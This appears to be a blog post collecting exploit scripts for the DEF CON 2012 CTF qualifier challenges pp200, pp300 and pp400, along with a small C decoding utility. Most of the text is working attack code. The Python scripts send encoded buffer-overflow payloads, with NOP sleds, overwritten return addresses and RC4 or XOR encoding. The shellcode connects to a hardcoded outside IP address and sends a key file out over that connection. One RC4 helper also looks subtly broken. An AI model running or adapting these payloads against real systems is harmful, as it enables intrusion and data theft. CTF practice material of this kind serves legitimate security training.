Passion

#include <stdio.h>

int main(int argc, char *argv[])
{
	char fname[] = "c:\\mac.h";
	char buf[1024] = {0};
	FILE* fp;
	int ret = 0;

	fp = fopen(fname, "r");
	if (fp < 0)
	{
		printf("fopen error\n");
		return -1;
	}
	ret = fread(buf,1,991, fp);
	
	printf("buf: %s\n\n", buf);

	__asm{
		xor ecx, ecx
		mov edx, 1
		lea eax, dword ptr buf
		xor ebx, ebx
		dec eax
		dec ecx
#if 1 
badcob:
		inc eax
		inc ecx
		mov bl, byte ptr ss:[eax]
		not bl
		mov byte ptr ss:[eax], bl
		cmp ecx, 0x3df
		jnz badcob		
#endif
	}

		

	printf("buf: %s\n", buf);
	fclose(fp);
	return 0;
}

http://blog.oxff.net/posts/DefCon%2020%20CTF%20Qualifications%3A%20pp400-anvszwpmjdyizhsqgngq.html 참조.

#!/usr/bin/python2.6
#defcon 2012, pp400 exploit - badcob

import socket,sys
import struct
import time

def rc4_initialize(key,x,y):
    tmp = range(255,-1,-1)
    for i in range(0, 256):
        y = (y + tmp[x] +(ord(key[x & 0xf]))) & 0xff
        tmp[x],tmp[y] = tmp[y], tmp[x]
        
    return tmp

def rc4_pop_key(tmp, x, y):
    x = (x+1) & 0xff
    y = (y+tmp[x]) & 0xff
    tmp[x], tmp[y] = tmp[y], tmp[x]
    return tmp[(tmp[x]+tmp[y]) && 0xff], x, y

#shellcode 
sc = "\x83\xC4\x70\x6A\x61\x58\x99\x52\x6A\x01\x6A\x02\x50\xCD\x80\x96\x6A\x62\x58\x68\xD2\x00\x3C\xEB\x68\xAA\x02\x27\x0F"
sc += "\x89\xE3\x6A\x10\x53\x56\x50\xCD\x80\x6A\x05\x58\x52\x68\x2F\x6B\x65\x79\x68\x2E\x2F\x2F\x2F"
sc += "\x89\xE3\x52\x53\x50\xCD\x80\x97\x6A\x03\x58\x6A\x40\x53\x57\x50\xCD\x80\x50\x6A\x04\x58\x53\x56\x50\xCD\x80"

#stack address to overwrite
stack_address = 0xbfbfe9fc

#make payload
payload = []
sc += '\x90'
print len(sc)

while sc != '':
    payload.append(struct.unpack('<I', sc[:4])[0])
    sc = sc[4:]

#nop sled + shellcode
#0x42 : inc edx
payload = [0x90909090 for i in range(0,128-len(payload))] + payload
payload += [0x42424242 for i in range(0,248-128)]  
payload += [0xbfbfe9fc]

total_count = len(payload)
current_count = 0

#rc4 initialize
global tmp, x, y
x = 0
y = 0
key = '\xb6\x3d\x15\x3a\x04\x15\x69\x72\x45\xfe\xc2\x7f\x12\x78\xd7\x82'
tmp = rc4_initialize(key,x,y)
print tmp
print len(tmp)

#host, port 
host = '192.168.74.134'
port = 4016

def init(host,port):
    b = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    b.connect((host,port))  
    return b

s = init(host,port)

passwd = 'b366e2776ce9efff'+'\x0a'
s.send(passwd)
print s.recv(256)
sys.stdout.flush()

for i in payload:
    print current_count, hex(i)
    data_list = []
    data = str(struct.unpack('<f', struct.pack('<I', i))[0])
    data = data[::-1]
    for j in data:
        value, x, y = rc4_pop_key(tmp, x, y)
        data_list.append(chr(ord(j) ^ value))
    data_list.reverse()
    data = ''.join(data_list)
    print data.encode('hex')
    try:
        s.send(data.encode('hex')+'\x0a')
    except:
        print 'float error:', i, hex(i), '[+]' + data.encode('hex') + '[+]'
        break
    current_count += 1

#!/usr/bin/python2.6
#defcon 2012, pp300 exploit - badcob

import socket, sys
from struct import pack 

def make_connection(host,port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host,port))
    return s

def make_payload(scode):
    #padding 1 byte : shellcode length 79byte
    scode += "\x90"

    #move byte ptr ss:[ebp+x], shellcode 1 byte
    mov_byte_ptr = "\xc6\x45"    
    tmp = ''
    count = 0
    for x in scode:
        tmp += mov_byte_ptr + chr(count) + x
        count += 0x1

    #call ebp
    call_ebp = "\xff\xd5\x90\xff"
    return tmp + call_ebp
    
    
#shellcode
scode = "\x83\xC4\x70\x6A\x61\x58\x99\x52\x6A\x01\x6A\x02\x50\xCD\x80\x96\x6A\x62\x58\x68\xD2\x00\x3C\xEB\x68\xAA\x02\x27\x0F"
scode += "\x89\xE3\x6A\x10\x53\x56\x50\xCD\x80\x6A\x05\x58\x52\x68\x2F\x6B\x65\x79\x68\x2E\x2F\x2F\x2F"
scode += "\x89\xE3\x52\x53\x50\xCD\x80\x97\x6A\x03\x58\x6A\x40\x53\x57\x50\xCD\x80\x50\x6A\x04\x58\x53\x56\x50\xCD\x80"

host = "192.168.74.134"
port = 7548

num = "3c56bc31268ac65f" + "\x0a"

#make payload
payload = make_payload(scode)

s = make_connection(host,port) 
s.send(num)
s.send(payload)

#!/usr/bin/python2.6
#defcon 2012, pp200 exploit - badcob

import socket, sys
from struct import pack 

def make_connection(host,port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host,port))
    return s

#shellcode
scode = "\x83\xC4\x70\x6A\x61\x58\x99\x52\x6A\x01\x6A\x02\x50\xCD\x80\x96\x6A\x62\x58\x68\xD2\x00\x3C\xEB\x68\xAA\x02\x27\x0F"
scode += "\x89\xE3\x6A\x10\x53\x56\x50\xCD\x80\x6A\x05\x58\x52\x68\x2F\x6B\x65\x79\x68\x2E\x2F\x2F\x2F"
scode += "\x89\xE3\x52\x53\x50\xCD\x80\x97\x6A\x03\x58\x6A\x40\x53\x57\x50\xCD\x80\x50\x6A\x04\x58\x53\x56\x50\xCD\x80"

host = "192.168.74.134"
port = 8912

num = "b74b9d86e6cd3480" + "\x0a"
user_id = "a6" + "\x0a"
ret = "\xbc\xe2\xbe\xbf"

#make payload
temp = "\x90"*416+scode+"\x90"*17+"\x0f"
temp += ret + "\x0a"

payload = ''

for x in temp:
    a = ord(x)^0xa6
    if a == 0xa:
        print "failed"
        break
    payload += chr(a)

s = make_connection(host,port) 
s.send(num)
print s.recv(128)
s.send(user_id)
print s.recv(128)
s.send(payload)